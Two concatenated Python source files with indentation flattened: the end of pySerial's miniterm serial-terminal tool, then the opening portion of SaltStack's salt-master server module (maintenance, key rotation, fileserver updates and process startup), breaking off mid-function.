sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
master.py
|
"""
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
"""
import collections
import copy
import ctypes
import functools
import logging
import multiprocessing
import os
import re
import signal
import stat
import sys
import threading
import time
import salt.acl
import salt.auth
import salt.client
import salt.client.ssh.client
import salt.crypt
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.engines
import salt.exceptions
import salt.ext.tornado.gen # pylint: disable=F0401
import salt.key
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.runner
import salt.serializers.msgpack
import salt.state
import salt.transport.server
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
import salt.wheel
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.stack_context import StackContext
from salt.transport import iter_transport_opts
from salt.utils.ctx import RequestContext
from salt.utils.debug import (
enable_sigusr1_handler,
enable_sigusr2_handler,
inspect_stack,
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.zeromq import ZMQ_VERSION_INFO, ZMQDefaultLoop, install_zmq, zmq
# pylint: enable=import-error,no-name-in-module,redefined-builtin
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
log = logging.getLogger(__name__)
class SMaster:
"""
Create a simple salt-master, this will generate the top-level master
"""
secrets = (
{}
) # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
"""
Create a salt master server instance
:param dict opts: The salt options dictionary
"""
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state["opts"]
self.master_key = state["master_key"]
self.key = state["key"]
SMaster.secrets = state["secrets"]
def __getstate__(self):
return {
"opts": self.opts,
"master_key": self.master_key,
"key": self.key,
"secrets": SMaster.secrets,
}
def __prep_key(self):
"""
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
"""
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingProcess):
"""
A generalized maintenance process which performs maintenance routines.
"""
def __init__(self, opts, **kwargs):
"""
Create a maintenance instance
:param dict opts: The salt options
"""
super().__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts["loop_interval"])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _post_fork_init(self):
"""
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
"""
# Load Runners
ropts = dict(self.opts)
ropts["quiet"] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(
self.opts, runner_client.functions_dict(), returners=self.returners
)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
if self.opts["maintenance_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Maintenance niceness to %d", self.opts["maintenance_niceness"]
)
os.nice(self.opts["maintenance_niceness"])
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
"""
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
# update git_pillar on first loop
last_git_pillar_update = 0
git_pillar_update_interval = self.opts.get("git_pillar_update_interval", 0)
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
if (now - last_git_pillar_update) >= git_pillar_update_interval:
last_git_pillar_update = now
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
"""
Evaluate accepted keys and create a msgpack file
which contains a list
"""
if self.opts["key_cache"] == "sched":
keys = []
# TODO DRY from CKMinions
if self.opts["transport"] in ("zeromq", "tcp"):
acc = "minions"
else:
acc = "accepted"
for fn_ in os.listdir(os.path.join(self.opts["pki_dir"], acc)):
if not fn_.startswith(".") and os.path.isfile(
os.path.join(self.opts["pki_dir"], acc, fn_)
):
keys.append(fn_)
log.debug("Writing master key cache")
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(
os.path.join(self.opts["pki_dir"], acc, ".key_cache"), mode="wb"
) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
"""
Rotate the AES key rotation
"""
to_rotate = False
dfn = os.path.join(self.opts["cachedir"], ".dfn")
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error("Found dropfile with incorrect permissions, ignoring...")
os.remove(dfn)
except os.error:
pass
if self.opts.get("publish_session"):
if now - self.rotate >= self.opts["publish_session"]:
to_rotate = True
if to_rotate:
log.info("Rotating master AES key")
for secret_key, secret_map in SMaster.secrets.items():
# should be unnecessary-- since no one else should be modifying
with secret_map["secret"].get_lock():
secret_map["secret"].value = salt.utils.stringutils.to_bytes(
secret_map["reload"]()
)
self.event.fire_event(
{"rotate_{}_key".format(secret_key): True}, tag="key"
)
self.rotate = now
if self.opts.get("ping_on_rotate"):
# Ping all minions to get them to pick up the new key
log.debug("Pinging all connected minions " "due to key rotation")
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
"""
Update git pillar
"""
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc: # pylint: disable=broad-except
log.error("Exception caught while updating git_pillar", exc_info=True)
def handle_schedule(self):
"""
Evaluate the scheduler
"""
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc: # pylint: disable=broad-except
log.error("Exception %s occurred in scheduled job", exc)
self.schedule.cleanup_subprocesses()
def handle_presence(self, old_present):
"""
Fire presence events if enabled
"""
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
if self.presence_events and self.event.connect_pull(timeout=3):
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {"new": list(new), "lost": list(lost)}
self.event.fire_event(data, tagify("change", "presence"))
data = {"present": list(present)}
self.event.fire_event(data, tagify("present", "presence"))
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingProcess):
"""
A process from which to update any dynamic fileserver backends
"""
def __init__(self, opts, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"], log_queue=state["log_queue"],
)
def __getstate__(self):
return {
"opts": self.opts,
"log_queue": self.log_queue,
}
def fill_buckets(self):
"""
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
"""
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = "{}.update".format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug("No update function for the %s filserver backend", backend)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in update_intervals[backend].items():
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
"An update_interval of 0 is not supported, "
"falling back to %s",
interval,
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = "{}_update_interval".format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
"%s key missing from configuration. Falling back to "
"default interval of %d seconds",
interval_key,
interval,
)
self.buckets.setdefault(interval, OrderedDict())[
(backend, update_func)
] = None
def update_fileserver(self, interval, backends):
"""
Threading target which handles all updates for a given wait interval
"""
def _do_update():
log.debug(
"Performing fileserver updates for items with an update "
"interval of %d",
interval,
)
for backend, update_args in backends.items():
backend_name, update_func = backend
try:
if update_args:
log.debug(
"Updating %s fileserver cache for the following "
"targets: %s",
backend_name,
update_args,
)
args = (update_args,)
else:
log.debug("Updating %s fileserver cache", backend_name)
args = ()
update_func(*args)
except Exception as exc: # pylint: disable=broad-except
log.exception(
"Uncaught exception while updating %s fileserver " "cache",
backend_name,
)
log.debug(
"Completed fileserver updates for items with an update "
"interval of %d, waiting %d seconds",
interval,
interval,
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
"""
Start the update threads
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if (
self.opts["fileserver_update_niceness"]
and not salt.utils.platform.is_windows()
):
log.info(
"setting FileServerUpdate niceness to %d",
self.opts["fileserver_update_niceness"],
)
os.nice(self.opts["fileserver_update_niceness"])
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver, args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
"""
The salt master server
"""
def __init__(self, opts):
"""
Create a salt master server instance
:param dict: The salt options
"""
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
"You have a version of ZMQ less than ZMQ 3.2! There are "
"known connection keep-alive issues with ZMQ < 3.2 which "
"may result in loss of contact with minions. Please "
"upgrade your ZMQ!"
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
"Current values for max open files soft/hard setting: %s/%s", mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts["max_open_files"]
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
"The value for the 'max_open_files' setting, %s, is higher "
"than the highest value the user running salt is allowed to "
"set (%s). Defaulting to %s.",
mof_c,
mof_h,
mof_h,
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info("Raising max open files value to %s", mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
"New values for max open files soft/hard values: %s/%s",
mof_s,
mof_h,
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
"Failed to raise max open files setting to %s. If this "
"value is too low, the salt-master will most likely fail "
"to run properly.",
mof_c,
)
def _pre_flight(self):
"""
Run pre flight checks. If anything in this method fails then the master
should not start up.
"""
errors = []
critical_errors = []
try:
os.chdir("/")
except OSError as err:
errors.append("Cannot change to root directory ({})".format(err))
if self.opts.get("fileserver_verify_config", True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
"Failed to load fileserver backends, the configured backends "
"are: {}".format(", ".join(self.opts["fileserver_backend"]))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append("{}".format(exc))
if not self.opts["fileserver_backend"]:
errors.append("No fileserver backends are configured")
# Check to see if we need to create a pillar cache dir
if self.opts["pillar_cache"] and not os.path.isdir(
os.path.join(self.opts["cachedir"], "pillar_cache")
):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts["cachedir"], "pillar_cache"))
except OSError:
pass
if self.opts.get("git_pillar_verify_config", True):
try:
git_pillars = [
x
for x in self.opts.get("ext_pillar", [])
if "git" in x and not isinstance(x["git"], str)
]
except TypeError:
git_pillars = []
critical_errors.append(
"Invalid ext_pillar configuration. It is likely that the "
"external pillar type was not specified for one or more "
"external pillars."
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts["ext_pillar"] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo["git"],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY,
)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical("Master failed pre flight checks, exiting\n")
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
"""
Turn on the master server components
"""
self._pre_flight()
log.info("salt-master is starting as user '%s'", salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
),
),
"reload": salt.crypt.Crypticle.generate_key_string,
}
log.info("Creating master process manager")
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info("Creating master publisher process")
log_queue = salt.log.setup.get_multiprocessing_logging_queue()
for _, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager, kwargs={"log_queue": log_queue})
pub_channels.append(chan)
log.info("Creating master event publisher process")
self.process_manager.add_process(
salt.utils.event.EventPublisher, args=(self.opts,)
)
if self.opts.get("reactor"):
if isinstance(self.opts["engines"], list):
rine = False
for item in self.opts["engines"]:
if "reactor" in item:
rine = True
break
if not rine:
self.opts["engines"].append({"reactor": {}})
else:
if "reactor" not in self.opts["engines"]:
log.info("Enabling the reactor engine")
self.opts["engines"]["reactor"] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info("Creating master maintenance process")
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get("event_return"):
log.info("Creating master event return process")
self.process_manager.add_process(
salt.utils.event.EventReturn, args=(self.opts,)
)
ext_procs = self.opts.get("ext_processes", [])
for proc in ext_procs:
log.info("Creating ext_processes process: %s", proc)
try:
mod = ".".join(proc.split(".")[:-1])
cls = proc.split(".")[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception: # pylint: disable=broad-except
log.error("Error creating ext_processes process: %s", proc)
if HAS_HALITE and "halite" in self.opts:
log.info("Creating master halite process")
self.process_manager.add_process(Halite, args=(self.opts["halite"],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts["con_cache"]:
log.info("Creating master concache process")
self.process_manager.add_process(
salt.utils.master.ConnectedCache, args=(self.opts,)
)
# workaround for issue #16315, race condition
log.debug("Sleeping for two seconds to let concache rest")
time.sleep(2)
log.info("Creating master request server process")
kwargs = {}
if salt.utils.platform.is_windows():
kwargs["log_queue"] = log_queue
kwargs[
"log_queue_level"
] = salt.log.setup.get_multiprocessing_logging_level()
kwargs["secrets"] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name="ReqServer",
)
self.process_manager.add_process(FileserverUpdate, args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts["discovery"]:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(
salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts["discovery"]["port"],
listen_ip=self.opts["interface"],
answer={
"mapping": self.opts["discovery"].get("mapping", {})
},
).run
)
else:
log.error("Unable to load SSDP: asynchronous IO is not available.")
if sys.version_info.major == 2:
log.error(
'You are using Python 2, please install "trollius" module to enable SSDP discovery.'
)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingProcess):
"""
Manage the Halite server
"""
def __init__(self, hopts, **kwargs):
"""
Create a halite instance
:param dict hopts: The halite options
"""
super().__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["hopts"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"hopts": self.hopts,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def run(self):
"""
Fire up halite!
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingProcess):
"""
Starts up the master request server, minions send results to this
interface.
"""
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
"""
Create a request server
:param dict opts: The salt options dictionary
:key dict: The user starting the server and the AES key
:mkey dict: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
"""
super().__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["key"],
state["mkey"],
secrets=state["secrets"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"key": self.key,
"mkey": self.master_key,
"secrets": self.secrets,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super()._handle_signals(signum, sigframe)
def __bind(self):
"""
Binds the reply server
"""
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts["cachedir"], ".dfn")
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less then parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager", wait_for_kill=1
)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != "tcp":
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs["log_queue"] = self.log_queue
kwargs["log_queue_level"] = self.log_queue_level
